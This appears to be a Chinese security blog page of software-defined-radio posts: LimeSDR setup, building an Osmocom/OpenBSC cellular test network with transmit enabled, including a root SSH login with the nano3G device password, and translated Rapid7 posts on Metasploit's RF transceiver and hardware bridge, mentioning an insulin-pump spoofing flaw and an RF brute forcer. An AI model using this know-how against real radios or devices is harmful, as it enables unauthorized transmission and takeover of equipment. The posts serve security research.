LimeSDR Getting Started Quickly | LimeSDR上手指南

cn0xroot3条评论

Author:雪碧 0xroot@360 Unicorn Team

文章首发地址:http://bobao.360.cn/learning/detail/3721.html

0x00 概览

LimeSDR部分特性: USB 3.0 ; 4 x Tx 发射天线接口 6 x Rx 接收天线接口;

可用于Wi-Fi, GSM, UMTS, LTE, LoRa, Bluetooth, Zigbee, RFID等开发测试环境中。

RTL电视棒、HackRF、BladeRF、USRP、LimeSDR参数对比表:

Snip20170410_13

HackRF One的价格,性能参数却能跟BladeRF甚至USRP媲美!

LimeSDR核心组件:

Lime_suite_comps

先上几张特写:

主板长10cm,算上USB接口11.5cm: 长

主板宽5.7cm: 宽 相对于HackRF、BladeRF、USRP这三款主流SDR硬件(USRP mini除外),体积已经很小巧了。LimeSDR其体积实测只有一个iPhone5s的体积大小!

当插上USB供电后,除了上图显示的两颗绿色LED灯,还有一颗一闪一闪的红色LED灯也在工作。

接下来将分一键快速安装和源码编译安装来使用LimeSDR硬件,推荐使用源码编译安装。

0x01 Mac OSX

1.1 搭建开发环境

Mac OSX当中强烈推荐通过Mac Port 搭建SDR环境,配合源码编译达到最佳效果。

1.通过AppStore安装Xcode https://itunes.apple.com/cn/app/xcode/id497799835?mt=12

2.下载安装 XQuartz/X11 http://xquartz.macosforge.org/landing

3.下载安装 MacPorts https://trac.macports.org/wiki/InstallingMacPorts

sudo port search sdr
Snip20170408_11.png
sudo port install rtl-sdr hackrf  bladeRF uhd gnuradio gqrx gr-osmosdr gr-fosphor

完成之后便可从GayHub上clone源码并进行编译安装。

1.2 源码编译LimeSuite

git clone https://github.com/myriadrf/LimeSuite.git
cd LimeSuite
mkdir builddir && cd builddir
cmake ../
make -j4
sudo make install

1.3 源码编译UHD驱动&&增加UHD对LimeSDR的支持

jocover基于UHD给LimeSDR开发了LimeSDR的驱动支持OpenUSRP,把LimeSDR来模拟成USRP B210来使用。

git clone https://github.com/EttusResearch/uhd.git
cd uhd/host/lib/usrp
git clone https://github.com/jocover/OpenUSRP.git
echo "INCLUDE_SUBDIRECTORY(OpenUSRP)">>CMakeLists.txt
mkdir build && cd build
cmake ..
make -j4
sudo make install

1.4 添加环境变量

echo 'export UHD_MODULE_PATH=/usr/lib/uhd/modules' >> ~/.bashrc

如果用的是iTerm2+zsh则执行:

echo 'export UHD_MODULE_PATH=/usr/lib/uhd/modules' >> ~/.zshrc

1.5 检测LimeSDR模拟USRP是否成功:

LimeSDR模拟成USRP B210之后最终的效果跟USRP是一样的:

uhd_find_devices

Snip20170408_10.png

Snip20170408_7.png

uhd_usrp_probe
Mac OS; Clang version 8.1.0 (clang-802.0.38); Boost_105900; UHD_003.010.001.001-MacPorts-Release

Using OpenUSRP
[WARNING] Gateware version mismatch!
  Expected gateware version 2, revision 8
  But found version 2, revision 6
  Follow the FW and FPGA upgrade instructions:
  http://wiki.myriadrf.org/Lime_Suite#Flashing_images
  Or run update on the command line: LimeUtil --update

[INFO] Estimated reference clock 30.7195 MHz
[INFO] Selected reference clock 30.720 MHz
[INFO] LMS7002M cache /Users/cn0xroot/.limesuite/LMS7002M_cache_values.db
MCU algorithm time: 10 ms
MCU Ref. clock: 30.72 MHz
MCU algorithm time: 163 ms
MCU algorithm time: 1 ms
MCU Ref. clock: 30.72 MHz
MCU algorithm time: 104 ms
MCU algorithm time: 1 ms
MCU Ref. clock: 30.72 MHz
MCU algorithm time: 167 ms
MCU algorithm time: 1 ms
MCU Ref. clock: 30.72 MHz
MCU algorithm time: 104 ms
  _____________________________________________________
 /
|       Device: B-Series Device
|     _____________________________________________________
|    /
|   |       Mboard: B210
|   |   revision: 4
|   |   product: 2
|   |   serial: 243381F
|   |   FW Version: 3
|   |   FPGA Version: 2.6
|   |
|   |   Time sources:  none, internal, external
|   |   Clock sources: internal, external
|   |   Sensors: ref_locked
|   |     _____________________________________________________
|   |    /
|   |   |       RX DSP: 0
|   |   |
|   |   |   Freq range: -10.000 to 10.000 MHz
|   |     _____________________________________________________
|   |    /
|   |   |       RX DSP: 1
|   |   |
|   |   |   Freq range: -10.000 to 10.000 MHz
|   |     _____________________________________________________
|   |    /
|   |   |       RX Dboard: A
|   |   |     _____________________________________________________
|   |   |    /
|   |   |   |       RX Frontend: A
|   |   |   |   Name: FE-RX1
|   |   |   |   Antennas: TX/RX, RX2
|   |   |   |   Sensors: temp, lo_locked, rssi
|   |   |   |   Freq range: 30.000 to 3800.000 MHz
|   |   |   |   Gain range PGA: 0.0 to 76.0 step 1.0 dB
|   |   |   |   Bandwidth range: 1000000.0 to 60000000.0 step 1.0 Hz
|   |   |   |   Connection Type: IQ
|   |   |   |   Uses LO offset: No
|   |   |     _____________________________________________________
|   |   |    /
|   |   |   |       RX Frontend: B
|   |   |   |   Name: FE-RX2
|   |   |   |   Antennas: TX/RX, RX2
|   |   |   |   Sensors: temp, lo_locked, rssi
|   |   |   |   Freq range: 30.000 to 3800.000 MHz
|   |   |   |   Gain range PGA: 0.0 to 76.0 step 1.0 dB
|   |   |   |   Bandwidth range: 1000000.0 to 60000000.0 step 1.0 Hz
|   |   |   |   Connection Type: IQ
|   |   |   |   Uses LO offset: No
|   |   |     _____________________________________________________
|   |   |    /
|   |   |   |       RX Codec: A
|   |   |   |   Name: B210 RX dual ADC
|   |   |   |   Gain Elements: None
|   |     _____________________________________________________
|   |    /
|   |   |       TX DSP: 0
|   |   |
|   |   |   Freq range: -10.000 to 10.000 MHz
|   |     _____________________________________________________
|   |    /
|   |   |       TX DSP: 1
|   |   |
|   |   |   Freq range: -10.000 to 10.000 MHz
|   |     _____________________________________________________
|   |    /
|   |   |       TX Dboard: A
|   |   |     _____________________________________________________
|   |   |    /
|   |   |   |       TX Frontend: A
|   |   |   |   Name: FE-TX1
|   |   |   |   Antennas: TX/RX
|   |   |   |   Sensors: temp, lo_locked
|   |   |   |   Freq range: 30.000 to 3800.000 MHz
|   |   |   |   Gain range PGA: 0.0 to 89.8 step 0.2 dB
|   |   |   |   Bandwidth range: 800000.0 to 60000000.0 step 1.0 Hz
|   |   |   |   Connection Type: IQ
|   |   |   |   Uses LO offset: No
|   |   |     _____________________________________________________
|   |   |    /
|   |   |   |       TX Frontend: B
|   |   |   |   Name: FE-TX2
|   |   |   |   Antennas: TX/RX
|   |   |   |   Sensors: temp, lo_locked
|   |   |   |   Freq range: 30.000 to 3800.000 MHz
|   |   |   |   Gain range PGA: 0.0 to 89.8 step 0.2 dB
|   |   |   |   Bandwidth range: 800000.0 to 60000000.0 step 1.0 Hz
|   |   |   |   Connection Type: IQ
|   |   |   |   Uses LO offset: No
|   |   |     _____________________________________________________
|   |   |    /
|   |   |   |       TX Codec: A
|   |   |   |   Name: B210 RX dual ADC
|   |   |   |   Gain Elements: None

➜  ~

1.6 捕获遥控信号

osmocom_fft -F -f 315e6 -s 2e6

Snip20170410_14.png

0x02 Ubuntu

2.1 更新软件包

sudo add-apt-repository -y ppa:myriadrf/drivers
sudo apt-get update
apt-cache search sdr

apt-Cache.jpg

2.2 安装SDR常用软件:

sudo apt-get update
sudo apt-get install git
sudo apt-get install python-pip

pip install --upgrade pip
pip install git+https://github.com/gnuradio/pybombs.git

pybombs recipes add gr-recipes git+https://github.com/gnuradio/gr-recipes.git 
pybombs recipes add gr-etcetera git+https://github.com/gnuradio/gr-etcetera.git

pybombs prefix init /usr/local -a myprefix -R gnuradio-default
pybombs install gqrx gr-osmosdr uhd

2.3 安装Lime_Suite所需依赖包

#packages for soapysdr available at myriadrf PPA
sudo add-apt-repository -y ppa:myriadrf/drivers
sudo apt-get update

#install core library and build dependencies
sudo apt-get install git g++ cmake libsqlite3-dev

#install hardware support dependencies
sudo apt-get install libsoapysdr-dev libi2c-dev libusb-1.0-0-dev

#install graphics dependencies
sudo apt-get install libwxgtk3.0-dev freeglut3-dev

接下来的源码编译过程与在OSX下源码编译过程一样:

2.4 源码编译LimeSuite

git clone https://github.com/myriadrf/LimeSuite.git
cd LimeSuite
mkdir builddir && cd builddir
cmake ../
make -j4
sudo make install

make install

执行LimeSuiteGUI启动LimeSDR的软件图形化界面:

LimeSuiteGUI

2.5 源码编译UHD驱动&&增加UHD对LimeSDR的支持

源码编译UHD+OpenUSRP

git clone https://github.com/EttusResearch/uhd.git
cd uhd/host/lib/usrp
git clone https://github.com/jocover/OpenUSRP.git
echo "INCLUDE_SUBDIRECTORY(OpenUSRP)">>CMakeLists.txt
cd ../../
mkdir build && cd build
cmake ..
make -j4
sudo make install
sudo ldconfig

2.6 添加环境变量

echo 'export UHD_MODULE_PATH=/usr/lib/uhd/modules' >> ~/.bashrc

2.7 GNURadio使用测试

wget http://www.0xroot.cn/SDR/signal-record.grc
gnuradio-companion signal-record.grc

此幻灯片需要JavaScript支持。

0x03 Reference

http://www.cnx-software.com/2016/04/29/limesdr-open-source-hardware-software-defined-radio-goes-for-199-and-up-crowdfunding/

https://wiki.myriadrf.org/Lime_Suite

http://linuxgizmos.com/open-source-sdr-sbc-runs-snappy-ubuntu-on-cyclone-v/

Getting started with 3G | ip.access nano3G+OpenBSC+Osmocom-bb Part 1

cn0xroot留下评论

c7ak_5_u0aan1co

English Version could be find at Osmocom.org

https://osmocom.org/projects/cellular-infrastructure/wiki/Accelerate3g5_–_unicornteam

0x01环境搭建

PC:Ubuntu16.04

HardWare:ip.access nano3G

SoftWare:Osmocom

1.1 安装交叉编译环境

sudo apt-get update

sudo apt-get install libtool shtool autoconf git-core pkg-config make gcc build-essential libgmp3-dev libmpfr-dev libx11-6 libx11-dev texinfo flex bison libncurses5 libncurses5-dbg libusb-0.1-4 libpcsclite1 libccid pcscd libncurses5-dev libncursesw5 libncursesw5-dbg libncursesw5-dev zlibc zlib1g-dev libmpfr4 libmpc-dev libpcsclite-dev 
sudo ldconfig

mkdir osm
cd osm
mkdir build install src
wget http://bb.osmocom.org/trac/raw-attachment/wiki/GnuArmToolchain/gnu-arm-build.3.sh
cd src
wget http://ftp.gnu.org/gnu/gcc/gcc-4.8.2/gcc-4.8.2.tar.bz2
wget http://ftp.gnu.org/gnu/binutils/binutils-2.21.1a.tar.bz2
wget ftp://sources.redhat.com/pub/newlib/newlib-1.19.0.tar.gz

cd ..
chmod +x gnu-arm-build.3.sh
sudo bash gnu-arm-build.3.sh

1.2 设置交叉编译环境变量

cd install/bin
pwd

vi ~/./.bashrc
export PATH=$PATH:/home/$username(change this to your name)/osm/install/bin

#save and quit
source ~/.bashrc

0x02 源码编译CalypsoBTS

2.1 编译libosmo-dsp

git clone git://git.osmocom.org/libosmo-dsp.git
cd libosmo-dsp/
autoreconf -i
./configure
make
sudo make install
cd ..

2.2 编译osmocom-bb

git clone git://git.osmocom.org/osmocom-bb.git trx
cd trx/
git checkout jolly/testing
cd src/

# 需要 TX 功能支持
# 取消target/firmware/Makefile代码中'CFLAGS += -DCONFIG_TX_ENABLE' 前边的注释
# 并在make时启用transceiver功能支持
make HOST_layer23_CONFARGS=--enable-transceiver

2.3 安装依赖包

sudo apt-get install sqlite3 libdbi-dev libdbd-sqlite3 libsctp-dev

2.4 编译 Ortp

wget http://download.savannah.gnu.org/releases/linphone/ortp/sources/ortp-0.22.0.tar.gz
tar -xvf ortp-0.22.0.tar.gz
cd ortp-0.22.0/
./configure
make
sudo make install
sudo ldconfig
cd ..

2.5 编译libosmo-abis

git clone git://git.osmocom.org/libosmo-abis.git
cd libosmo-abis
autoreconf -i
./configure
make
sudo make install
sudo ldconfig
cd ..

2.6 编译libosmo-netif

git clone git://git.osmocom.org/libosmo-netif.git
cd libosmo-netif/
autoreconf -i
./configure
make
sudo make install
sudo ldconfig
cd ..

2.7 编译openbsc

编译Openbsc时需用到PCAP库文件,编译前先搜索&安装依赖包:

apt-cache search PCAP
sudo pat-get install libpcap-dev libpcap0.8 libpcap0.8-dbg libpcap0.8-dev
sudo ldconfig

git clone git://git.osmocom.org/openbsc.git
cd openbsc/openbsc/
autoreconf -i
./configure
make
sudo make install
cd ../..

git clone git://git.osmocom.org/openbsc.git
cd openbsc/openbsc/
autoreconf -i
./configure
make
sudo make install
cd ../..

2.8 编译osmo-bts

git clone git://git.osmocom.org/osmo-bts.git
cd osmo-bts
autoreconf -i
./configure --enable-trx
make
sudo make install
cd ..

2.9 创建OpenBSC配置文件

#如果配置文件不存在需要先创建 Create the configuration folder if it isn't exist yet
mkdir ~/.osmocom
cd ~/.osmocom
touch ~/.osmocom/open-bsc.cfg
touch ~/.osmocom/osmo-bts.cfg

0x03 源码编译Cellular Infrastructure

3.1 克隆源码

git clone git://git.osmocom.org/libosmocore
git clone git://git.osmocom.org/libosmo-abis
git clone git://git.osmocom.org/openbsc
git clone git://git.osmocom.org/libosmo-netif
git clone git://git.osmocom.org/libosmo-sccp
git clone git://git.osmocom.org/libsmpp34
git clone git://git.osmocom.org/openggsn

3.2 下载&执行自动编译脚本

wget https://osmocom.org/attachments/download/2438/build_2G.sh
chmod 777  build_2G.sh
sudo bash build_2G.sh

0x04 配置OpenBSC

4.1 启动BTS

终端1:

osmo-nitb -c ~/.osmocom/open-bsc.cfg -l ~/.osmocom/hlr.sqlite3 -P -C --debug=DRLL:DCC:DMM:DRR:DRSL:DNM

终端2:

telnet localhost 4242

2017-04

4.2 配置IP

PC

IP:192.168.31.147 (通过WiFi连接)

路由器

IP:192.168.31.1

3G Access Point

IP:未知

方法1:进入路由后台,查找3G Access Point IP

network

方法2:通过abissip-find找到3G Access Point IP

cd openbsc/openbsc/src/ipaccess
#or
cd openbsc/openbsc/build-2G/src/ipaccess

sudo ./abisip-find

ipfind

4.3 Telnet连入3G Access Point

telnet 3G Access Point's IP 8090

telnet

4.4 SSH连入

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.31.136
password:newsys

snip20170411_21

ipaccess-config

init3@0xroot:~/osm/openbsc/openbsc/src/ipaccess$ ./ipaccess-config --help
ipaccess-config (C) 2009-2010 by Harald Welte and others
This is FREE SOFTWARE with ABSOLUTELY NO WARRANTY

Usage: ipaccess-config IP_OF_BTS
Commands for writing to the BTS:
  -u --unit-id UNIT_ID        Set the Unit ID of the BTS
  -o --oml-ip IP        Set primary OML IP (IP of your BSC)
  -i --ip-address IP/MASK    Set static IP address + netmask of BTS
  -g --ip-gateway IP        Set static IP gateway of BTS
  -r --restart            Restart the BTS (after other operations)
  -n --nvram-flags FLAGS/MASK    Set NVRAM attributes
  -S --nvattr-set FLAG    Set one additional NVRAM attribute
  -U --nvattr-unset FLAG    Set one additional NVRAM attribute
  -l --listen TESTNR        Perform specified test number
  -L --Listen TEST_NAME        Perform specified test
  -s --stream-id ID        Set the IPA Stream Identifier for OML
  -d --software FIRMWARE    Download firmware into BTS

Miscellaneous commands:
  -h --help            this text
  -H --HELP            Print parameter details.
  -f --firmware FIRMWARE    Provide firmware information
  -w --write-firmware        This will dump the firmware parts to the filesystem. Use with -f.
  -p --loop            Loop the tests executed with the --listen command.

ipaccess-proxy

init3@0xroot:~/osm/openbsc/openbsc/src/ipaccess$ ./ipaccess-proxy --help
Usage: ipaccess-proxy [options]
 ipaccess-proxy is a proxy BTS.
 -h --help. This help text.
 -l --listen IP. The ip to listen to.
 -b --bsc IP. The BSC IP address.
 -g --gprs IP. Take GPRS NS from that IP.

 -s --disable-color. Disable the color inside the logging message.
 -e --log-level number. Set the global loglevel.
 -T --timestamp. Prefix every log message with a timestamp.
 -V --version. Print the version of OpenBSC.

0x05 Reference

https://osmocom.org/projects/cellular-infrastructure/wiki/Build_from_Source

http://osmocom.org/projects/baseband/wiki/CalypsoBTS

https://osmocom.org/projects/cellular-infrastructure/wiki/Getting_Started_with_3G

https://osmocom.org/projects/osmocscn/wiki/Osmocom_3G_-_Getting_Started/3

https://osmocom.org/projects/cellular-infrastructure/wiki/Configuring_the_ipaccess_nano3G

Metasploit的射频收发器功能 | Metasploit’s RF Transceiver Capabilities

cn0xroot留下评论

https://community.rapid7.com/community/metasploit/blog/2017/03/21/metasploits-rf-transceiver-capabilities

物联网兴起

我们花费大量时间来监控我们的企业网络,并使用许多工具来检测异常的行为。我们不断地扫描漏洞、公布测试。然而,我们经常不能认识到自己网络,和家庭中的小型(有时是大型)物联网(IoT)设备。令人震惊的是,考虑到它们的普遍性 – 这些设备并不是容易被测试的。

RF:(无线射频识别(RadioFrequency))一般指无线射频

虽然很困难,在技术上,可以通过其以太网侧的连接来发现和识别这其中的部分IoT设备。但这不能让我们全面了解这些设备对消费者或企业带来的风险。当仅评估以太网连接的设备时,您可能会错过对企业安全造成重大影响的无线系统。无线网络通常会控制警报系统、监控、门禁、机房HVAC控制等诸多领域。

这给我们带来了一个非常关键的问题:如何真正确定这些设备的风险?

从最基础开始:

  • 这些连接的设备能做什么?
  • 这些设备的作用范围是多少?
  • 设备是否具有无线功能?

传统上,我们经常对802.11无线网络执行周期扫描,以确保接入点是否安全,网络流量是否过大。我们可以监控并创建堆叠的AP以防止他们某一个挂掉或者被附近电磁干扰。当然,如果你问:其它频率的无线频段呢?而这恰恰是我们要研究的领域和方向。

也许您由于其他原因使用非802.11标准以外的其他无线电频。遥控车库门?RFID读卡器、无线安全系统、Zigbee控制灯或HVAC系统等。

这些设备的频率范围是多少?它们是否加密受保护?当受到干扰时会发生什么?在封闭或开放的状态下是否失败?

无法有效地回答这些问题,是我们发布Metasploit硬件桥射频(RF)收发器的真正原因,也说明为什么我们认为这将是安全研究人员和渗透测试人员了解其实际攻击面的关键工具。

现在,安全团队将能够对公司的安全状况进行更真实的评估。能够测试物理安全控制,并更好地了解物联网及其他设备的安全性。

以安全研究的名义进行的大部分活动可能是有争议的或难以理解的。 但RF测试肯定是正确的,随着我们看到越来越多的技术利用RF通信,研究领域变得越来越多和越普遍。

对安全测试领域开发的任何技术最常见的批评是:容易被攻击者利用。安全圈有个常见的反应:如果已经被攻击者利用,那我们唯有了解黑客在做什么、有效地模拟攻击方法,并展示攻击潜在的影响,才能采取必要的措施来阻止他们。

这是Metasploit背后的逻辑,以及驱动了Rapid7大规模的漏洞研究工作。这也是RF 收发器出现的原因。我们坚信,RF测试是漏洞测试非常重要的的一部分(虽然目前仍被忽视),随着物联网生态系统的发展,射频测试的重要性将会持续增加。

我们有这样一个案例,2016年,Rapid7的Jay Radcliffe公布了强生公司Animas OneTouch Ping胰岛素泵的多个漏洞。

https://v.qq.com/iframe/player.html?vid=h0387fb90nt&width=986&height=739.5&auto=0攻击演示过程

普通的泵具有血糖仪,其通过专有无线管理协议中的无线电频作为遥控器。泵和遥控器之间的通信以明文而非加密的形式传输。这为攻击者创造了机会,使用适当的技术手段和资源来欺骗短距离遥控器将触发未经授权的胰岛素注射。

虽然Jay认为攻击者利用这些漏洞的可能性比较低,但可能会严重伤害使用该技术的患者。幸运的是,Jay及时发现了这个问题,并给强生公司提出建议,通知病患者使其减轻风险。 如若没有RF测试,这些漏洞可能一直存在,患者将无法做出选择来保护自己。

Status-1
REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
REMOTE: 00 00 00 04 A3 5A 92 B2 4C 00 0E 0F .....Z..L...
PUMP: 00 00 FF 00 1A D1 81 81 ........
REMOTE: 20 00 0E 00 BF DB CC 6F ......o
PUMP: 03 00 F1 04 16 B9 B9 87 2C 01 00 00 ........,...
REMOTE: 03 00 F8 00 31 FD C9 EE ....1...
PUMP: 03 00 07 04 88 76 DA DD 2C 01 00 00 .....v..,...
REMOTE: 03 00 12 00 F0 30 0E FC .....0..
PUMP: 20 00 ED 12 E7 BC 93 43 01 01 27 05 26 02 8F 00 ......C..'.&...
PUMP: 57 45 45 4B 44 41 59 00 00 00 WEEKDAY...
PUMP: 05 00 EA 00 D5 8F 84 B3

样本数据包

工作原理

在解释其工作原理之前,需做一个简单申明: Rapid7不销售RF测试所需的硬件。您可以在任何地方获得。比如:Hacker Warehouse,Hak5,淘宝,京东,亚马逊或任何无线设备的电子商店。

使用射频(RF)收发器,安全专家能够制作并监控不同的RF数据包,以正确识别和访问公司内除以太网以外的无线网络系统。

第一个RF收发器版本支持TI cc11xx低功耗Sub-1GHz射频收发器。 RF收发器可以调整设备来识别和调制解码信号。甚至可以创建短时间的干扰来识别故障状态。该版本还提供了与TI cc11xx芯片组流行的RfCat python框架兼容的完整API。如果您现有的程序使用RfCat,您可以轻易的将它们移植到Metasploit中。此版本附带两个后置模块:基于暴力破解的振幅调制(rfpwnon) 和 通用发射器(transmitter)。

如何使用RF Transceiver

使用新的RF 收发器需要购买像Rard Stick One这样兼容RfCat的设备。 然后下载最新的RfCat驱动程序,在这些驱动程序中,会有一个rfcat_msfrelay。这是RfCat中Metasploit Framework的中继服务器,运行在附属的RfCat兼容设备系统上。

您可以连接硬件桥:

$./msfconsole -q
msf > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > run

[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-02-16 20:04:57 -0600
[+] HWBridge session established
[*] HW Specialty: {"rftransceiver"=>true} Capabilities: {"cc11xx"=>true}
[!] NOTICE: You are about to leave the matrix. All actions performed on this hardware bridge
[!] could have real world consequences. Use this module in a controlled testing
[!] environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 hwbridge cmd/hardware rftransceiver 127.0.0.1 -> 127.0.0.1 (127.0.0.1)

msf auxiliary(connect) > sessions -i 1
[*] Starting interaction with 1...

hwbridge > status
[*] Operational: Yes
[*] Device: YARDSTICKONE
[*] FW Version: 450
[*] HW Version: 0348

要了解有关RF Transceiver的更多信息,在这里下载最新的Metasploit:

https://www.rapid7.com/products/metasploit/download/community

The rise of the Internet of Things

We spend a lot of time monitoring our corporate networks. We have many tools to detect strange behaviors. We scan for vulnerabilities. We measure our exposure constantly. However, we often fail to recognize the small (and sometimes big) Internet of Things (IoT) devices that are all around our network, employees, and employees’ homes. Somewhat alarmingly – considering their pervasiveness — these devices aren’t always the easiest to test.

Though often difficult, it is technically possible to find and identify some of these IoT devices via their Ethernet side connection. But that doesn’t always give us a full picture of the risk these devices present to consumers or organizations. When assessing only Ethernet connected devices you can miss the wireless world that can have a major impact on the security of your organization. Wireless systems often control alarm systems, surveillance monitoring, door access, server room HVAC controls, and many other areas.

Which leaves us with one very critical question: how do you really determine the risk of these devices?

Let’s start with the basics:

  • What do these connected devices do?
  • What is the range of exposure of these devices?
  • Does the device have wireless capabilities?

Traditionally, we often perform perimeter scans of our 802.11 wireless networks to ensure our Access Points are secure and the network bleed isn’t too large. We can monitor these Access Points (APs) to create overlap in case one goes down or gets interference from a nearby kitchen microwave.

However, if you’re asking yourself, “but what about the rest of the wireless spectrum?” that’s exactly the position we found ourselves in.

Radio, radio, everywhere

Chances are your company and employees are already using many other radio frequencies (RFs) outside of the standard 802.11 network for various reasons. Perhaps you have a garage door with a wireless opener? Company vehicle key fobs? Not to mention RFID card readers, wireless security systems, Zigbee controlled lights, or HVAC systems.

What are the ranges for these devices? Are they encrypted or protected? What happens when they receive interference? Do they fail in a closed or open state?

The inability to effectively answer these questions (easily or even at all) is the very reason we are releasing the RFTransceiver extension for Metasploit’s Hardware Bridge, and why we think this will be a critical tool for security researchers and penetration testers in understanding the actual attack surface.

Now, security teams will be able to perform a much broader assessment of a company’s true security posture. They will be able to test physical security controls and better understand when foreign IoT and other devices are brought onto the premises.

Sunlight is the best disinfectant

Much of the activity undertaken in the name of security research can be contentious, divisive, or hard to understand. This is certainly true of RF testing, an area of research becoming both more prevalent and increasingly necessary as we see more and more technologies leveraging RF communications.

The most common criticism of any technology created for the purpose of security testing is that bad guys could use it to do bad things. The most common response from the security research community is that the bad guys are already doing bad things, and that it’s only when we understand what they’re doing, can effectively replicate it, and demonstrate the potential impact of attacks, that we can take the necessary steps to stop them. Sunlight is the best disinfectant.

This is the logic behind Metasploit, as well as what drives Rapid7’s extensive vulnerability research efforts. It is also the reasoning behind the RFTransceiver. We strongly believe that RF testing is an incredibly important – though currently often overlooked – component of vulnerability testing. We believe that failing to test the usage of radio frequency in products puts people and organizations at risk. We also believe the importance of RF testing will continue to escalate as the IoT ecosystem further expands.

To provide an example of this kind of testing, in 2016, Rapid7’s Jay Radcliffe disclosed vulnerabilities in Johnson & Johnson’s Animas OneTouch Ping insulin pump. The popular pump has a blood glucose meter that serves as a remote control via radio frequency in a proprietary wireless management protocol. Communications between the pump and the remote control are sent in cleartext, rather than being encrypted. This creates an opportunity for an attacker with the right technical skills and resources, opportunity, and motive to spoof the Meter Remote and trigger unauthorized insulin injections.

While Jay considered the likelihood of an attacker exploiting these vulnerabilities in the wild to be quite low, it could seriously harm a patient using the technology. Fortunately, Jay’s research uncovered the problem and he was able to work with Johnson & Johnson to notify patients and advise them of ways to mitigate the risk. Without RF testing, these vulnerabilities would have continued to go unnoticed, and patients would not have the opportunity to make informed choices to protect themselves.

How it works

Just one quick author’s note before we get into the ‘how-to’ portion. Rapid7 does not sell the hardware required to perform RF testing. The required hardware can be found at any number of places, including Hacker Warehouse, Hak5, or any electronics store that carries software defined radios or RF transmitter hobbyist equipment.

With the RFTransceiver, security pros have the ability to craft and monitor different RF packets to properly identify and access a company’s wireless systems beyond Ethernet accessible technologies.

The first RFTransceiver release supports the TI cc11xx Low-Power Sub-1GHz RF Transceiver. The RFTransceiver extension makes it possible to tune your device to identify and demodulate signals. You can even create short bursts of interference to identify failure states. This release provides a full API that is compatible with the popular RfCat python framework for the TI cc11xx chipsets. If you have existing programs that use RfCat you should be able to port those into Metasploit without much difficulty. This release comes with two post modules: an Amplitude Modulation based brute forcer (rfpwnon) and a generic transmitter (transmitter).

How to use RFTransceiver

Using the new RFTransceiver extension requires the purchase of an RfCat-compatible device like the Yard Stick One. Then download the latest RfCat drivers, included with those drivers you will find rfcat_msfrelay. This is the Metasploit Framework relay server for RfCat. Run this on the system with the RfCat compatible device attached.

Then you can connect with the hardware bridge:

./msfconsole -q

msf > use auxiliary/client/hwbridge/connect

msf auxiliary(connect) > run

[*] Attempting to connect to 127.0.0.1...

[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-02-16 20:04:57 -0600

[+] HWBridge session established

[*] HW Specialty: {"rftransceiver"=>true}  Capabilities: {"cc11xx"=>true}

[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge

[!]          could have real world consequences.  Use this module in a controlled testing

[!]          environment and with equipment you are authorized to perform testing on.

[*] Auxiliary module execution completed

msf auxiliary(connect) > sessions

Active sessions

===============

Id  Type                   Information    Connection

--  ----                   -----------    ----------

1   hwbridge cmd/hardware  rftransceiver  127.0.0.1 -> 127.0.0.1 (127.0.0.1)

msf auxiliary(connect) > sessions -i 1

[*] Starting interaction with 1...

hwbridge > status

[*] Operational: Yes

[*] Device: YARDSTICKONE

[*] FW Version: 450

[*] HW Version: 0348

To learn more about the RFTransceiver, you can download the latest Metasploit here: https://www.rapid7.com/products/metasploit/download/community/

Metasploit 支持IoT安全测试

cn0xroot留下评论

metasploit

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。

2003年,H.D. Moore发布Metasploit后,对目标进行“渗透测试”的似乎变得容易多了。2016年面对物联网领域的安全威胁,Metasploit似乎一直“束手无策”,弄得小伙伴们十分失望。

snip20170208_2

近日,Rapid7 公布已更新 Metasploit 框架,支持物联网硬件的安全测试啦~~~~

本周,Rapid7博客宣布包括现代汽车控制器局域网CAN、物联网IoT设备以及工业控制系统在内的硬件,都可以通过Metasploit进行渗透测试。

这个名为“Hardware Bridge API”的扩展,让Metasploit成为首个“通杀”软件与硬件的渗透测试神器。它使用无线通讯并通过突破了之前用于阻止渗透测试的网络限制、直接控制硬件,同时它还解决了开发者需要为不同硬件打造定制工具的麻烦。

Rapid7的安全研究人员 Craig Smith称:设备制造者可以通过两种方式与Metasploit进行连接。一种是将Metasploit直接接入固件;另一种则是创建一个中继服务,特别是当设备无法使用以太网,例如软件定义无线电的设备只能通过USB端口连接。

HWBridge API的核心功能包括收集设备性能信息、版本化数据或电量相关信息,以及用于测试不同物理设备的独立扩展。例如测试汽车控制器局域网络时,它能够支持CAN并提供几种用于进行渗透测试的相关指令。

应用举例:

新发布的版本支持SocketCAN。如果你有Linux系统和支持SocketCAN的CAN总线嗅探器就可以进行测试了。local_hwbridge模块就是个简易中继服务的示例,你可以在本地或者远程服务器运行。

msf > use auxiliary/server/local_hwbridge
msf auxiliary(local_hwbridge) > run
[*] Auxiliary module execution completed
[*] Using URL: http://0.0.0.0:8080/6xOv7GqFs3YTeIE
[*] Local IP: http://10.1.10.21:8080/6xOv7GqFs3YTeIE
[*] Server started.
msf auxiliary(local_hwbridge) >

local_hwbridge模块默认会检测任何SocketCAN数据,不需要输入任何选项。中继服务无需在Metasploit中运行。如果硬件本身支持REST API的话就可以跳过这步。

msf > use auxiliary/client/hwbridge/connect
msf auxiliary(connect) > set rhost 10.1.10.21
rhost => 10.1.10.21
msf auxiliary(connect) > set targeturi 6xOv7GqFs3YTeIE
targeturi => 6xOv7GqFs3YTeIE
msf auxiliary(connect) > run
[*] Attempting to connect to 10.1.10.21...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2017-01-17 11:02:34 -0800
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf auxiliary(connect) > sessions
 
Active sessions
===============
 
  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
